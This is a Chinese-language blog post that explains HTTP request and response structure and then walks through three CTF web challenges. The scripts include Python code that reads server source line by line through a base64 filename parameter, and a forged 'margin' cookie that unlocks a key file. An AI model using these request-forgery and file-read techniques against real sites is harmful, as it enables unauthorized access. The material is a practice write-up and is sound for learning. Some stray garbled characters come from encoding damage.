其實一直想出一篇文章詳解Http請求的,但是本人現(xiàn)在沒有把握寫的通俗易懂宪肖,但Http請求對于web至為重要,所以請萌新們不要浮躁表制,耐心看完Woo__dalao寫的Http請求。
鄭重聲明:以下圖片和文字來自一篇文章帶你詳解 HTTP 協(xié)議一文
Http協(xié)議概述
HTTP協(xié)議(HyperText Transfer Protocol控乾,超文本傳輸協(xié)議)是用于從WWW服務(wù)器傳輸超文本到本地瀏覽器的傳輸協(xié)議么介。它可以使瀏覽器更加高效,使網(wǎng)絡(luò)傳輸減少蜕衡。它不僅保證計算機(jī)正確快速地傳輸超文本文檔壤短,還確定傳輸文檔中的哪一部分,以及哪部分內(nèi)容首先顯示(如文本先于圖形)等衷咽。
HTTP 工作過程
- 建立 TCP 連接
在HTTP工作開始之前鸽扁,客戶端首先要通過網(wǎng)絡(luò)與服務(wù)器建立連接,該連接是通過 TCP 來完成的镶骗,該協(xié)議與 IP 協(xié)議共同構(gòu)建 Internet桶现,即著名的 TCP/IP 協(xié)議族,因此 Internet 又被稱作是 TCP/IP 網(wǎng)絡(luò)鼎姊。HTTP 是比 TCP 更高層次的應(yīng)用層協(xié)議骡和,根據(jù)規(guī)則,只有低層協(xié)議建立之后相寇,才能進(jìn)行高層協(xié)議的連接慰于,因此,首先要建立 TCP 連接唤衫,一般 TCP 連接的端口號是80婆赠;- 客戶端向服務(wù)器發(fā)送請求命令
一旦建立了TCP連接,客戶端就會向服務(wù)器發(fā)送請求命令佳励;
例如:GET/sample/hello.jsp HTTP/1.1- 客戶端發(fā)送請求頭信息
客戶端發(fā)送其請求命令之后休里,還要以頭信息的形式向服務(wù)器發(fā)送一些別的信息蛆挫,之后客戶端發(fā)送了一空白行來通知服務(wù)器,它已經(jīng)結(jié)束了該頭信息的發(fā)送妙黍;- 服務(wù)器應(yīng)答
客戶端向服務(wù)器發(fā)出請求后悴侵,服務(wù)器會客戶端返回響應(yīng);
例如: HTTP/1.1 200 OK
響應(yīng)的第一部分是協(xié)議的版本號和響應(yīng)狀態(tài)碼- 服務(wù)器返回響應(yīng)頭信息
正如客戶端會隨同請求發(fā)送關(guān)于自身的信息一樣拭嫁,服務(wù)器也會隨同響應(yīng)向用戶發(fā)送關(guān)于它自己的數(shù)據(jù)及被請求的文檔可免;- 服務(wù)器向客戶端發(fā)送數(shù)據(jù)
服務(wù)器向客戶端發(fā)送頭信息后,它會發(fā)送一個空白行來表示頭信息的發(fā)送到此為結(jié)束做粤,接著浇借,它就以 Content-Type 響應(yīng)頭信息所描述的格式發(fā)送用戶所請求的實際數(shù)據(jù);- 服務(wù)器關(guān)閉 TCP 連接
一般情況下怕品,一旦服務(wù)器向客戶端返回了請求數(shù)據(jù)逮刨,它就要關(guān)閉 TCP 連接,然后如果客戶端或者服務(wù)器在其頭信息加入了這行代碼 Connection:keep-alive 堵泽,TCP 連接在發(fā)送后將仍然保持打開狀態(tài)修己,于是,客戶端可以繼續(xù)通過相同的連接發(fā)送請求迎罗。保持連接節(jié)省了為每個請求建立新連接所需的時間睬愤,還節(jié)約了網(wǎng)絡(luò)帶寬。
對于Http報文客戶端向服務(wù)器發(fā)送請求命令部分纹安,讓我們用一個簡單的例子解析HTTP 協(xié)議報文結(jié)構(gòu)
ps:這里推薦chorme瀏覽器的postman插件用來模擬http請求哦~
請求報文 POST /form/entry HTTP/1.1
響應(yīng)報文 HTTP/1.1 200 OK
應(yīng)用場景:在alert框中尋找flag
postman設(shè)置為Get請求尤辱,截獲報文請求主體
咋一看最后一行長得像flag,我們抽一行看看轉(zhuǎn)換編碼試試厢岂,
咦~flag竟然躺在這里
選擇unicode轉(zhuǎn)ASCALL
應(yīng)用場景 偽造post請求
Test1:在x-www-form-urlencoded
中填入
查找到的margin值
Result1:回顯更新光督,有戲
查看分配給瀏覽器的headers,flag躺在這里
Test2:提交題目發(fā)現(xiàn)不正確,多次post報文段發(fā)現(xiàn)
flag -> 6LeR55qE6L+Y5LiN6ZSZ77yM57uZ5L2gZmxhZ+WQpzog
固定不變,但隨后的字符串是隨機(jī)生成的.應(yīng)該是base64格式加密過了flag
Result2:
Test3:根據(jù)上述還是不行塔粒,根源在于字符串是隨機(jī)生成的,所以flag也是隨機(jī)的,基于python2.7模擬Http請求
post.py
import requests
import base64
url = 'http://120.24.86.145:8002/web6/'
req = requests.session()
res = req.get(url)
flag = res.headers['flag']
txt = base64.b64decode(flag)
txt = txt[txt.index(":"):]
#找到:的前一個位置结借,從之后索引間隔一個位置向后掃描
txt = base64.b64decode(txt)
data = {'margin': txt}
ans = req.post(url,data)
print(ans.content)
Result3:拿到flag
應(yīng)用場景 Cookies欺騙
Test1:通過postman解析請求報文,使用base64解密,filename=keys.txt
觀察到URL下存在index.php卒茬,修改filename=index.php,未回顯船老。修改line字段同上
Result1
Test2:基于python2.7,限定line參數(shù)范圍為40個,獲取index.php
import requests
import base64
url1 = 'http://120.24.86.145:8002/web11/index.php?line='
url2 = '&filename='
filename = base64.b64encode("index.php")
req = requests.session()
for line in range(0, 40):
url = url1 + str(line) + url2 + filename
print req.get(url).content
Result2 index.php
要求filename=keys.php,且要驗證cookies中的margin參數(shù)值為margin
D:\python27\python.exe F:/pythonProject/TestRun/Test.py
<?php
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array( '0' =>'keys.txt', '1' =>'index.php', );
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
$file_list[2]='keys.php';
}
if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
}
?>
Test3:驗證Cookies中的margin以及filename參數(shù)
import requests
import base64
url1 = 'http://120.24.86.145:8002/web11/index.php?line='
url2 = '&filename='
filename = base64.b64encode("index.php")
req = requests.session()
# for line in range(0, 40):
# url = url1 + str(line) + url2 + filename
# print req.get(url).content
filename = base64.b64encode("keys.php")
url = url1 + str(0) + url2 + filename
print req.get(url, cookies={'margin': 'margin'}).content
Result3:返回含有flag的php腳本
D:\python27\python.exe F:/pythonProject/TestRun/Test.py
<?php $key='KEY{key_keys}'; ?>
Process finished with exit code 0